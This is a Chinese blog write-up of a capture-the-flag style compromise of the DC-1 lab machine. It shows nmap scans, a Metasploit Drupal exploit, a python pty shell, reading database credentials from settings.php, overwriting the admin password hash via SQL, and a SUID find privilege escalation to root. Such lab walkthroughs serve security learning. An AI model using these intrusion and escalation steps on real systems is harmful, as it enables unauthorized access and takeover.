DC1靶场复现

DC1靶场复现记录

信息收集

  • namp扫描,探测同网段存活主机

    nmap -sP 192.168.233.0/24 --exclude 192.168.233.145

image-20201219110358275

  • 确定主机 192.168.233.141 nmap收集详细信息

    nmap -A -vv -T4 192.168.233.141

image-20201219110958062

  • 发现22 80 111 端口开放,从80端口入手
    • 打开网页浏览:192.168.233.141:80 发现是典型的drupal,存在漏洞的

image-20201219111204094

利用过程

  • 直接msf搜索drupal漏洞

    image-20201219111529651

  • 利用最新的2018的

    image-20201219111625640

  • 设置参数 rhost

    image-20201219111733362

  • yes的全部设置完毕,run攻击

    image-20201219111837860

  • 返回一个meterpreter

image-20201219111937271

  • 使用python反弹一个交互式shell

    python -c "import pty;pty.spawn('/bin/bash')"

image-20201219112134728

  • 进入home目录,发现flag4文件,提示需要提升权限

image-20201219112402735

  • 在www目录下发现flag1.txt,内容提示寻找站点的配置文件

image-20201219112647346

  • 寻找站点的配置文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php,查看

    image-20201219112855209

  • 发现数据库用户名和密码,连接数据库

    image-20201219113048527

  • 找user表,看admin用户名密码

image-20201219113600934

image-20201219113929592

  • 数据库中更新

    update users set pass="$S$DaqVf8o7HqKLOhCBZZRfmYeM9MuX/2HYi6MTCSYOH9wpf01gqbod" where name="admin";

image-20201219114308113

  • 更新成功,直接浏览器登录,发现flag3 提示sudo提权

    image-20201219115638091

提权

  • 使用find提权

    find命令是在指定目录下查找文件,并返回查找到的子目录和全部文件 -exec<执行指令>:假设find指令的回传值为True,就执行该指令 #如果find有suid权限,那就可以通过find执行任意root命令

  • 利用

    cd /tmp

    touch test

    find test -exec "/bin/sh" ;

image-20201219115859559

  • 查看flag4

    image-20201219115948675

posted @ 2020-12-19 12:03  木捏牛  阅读(256)  评论(0编辑  收藏  举报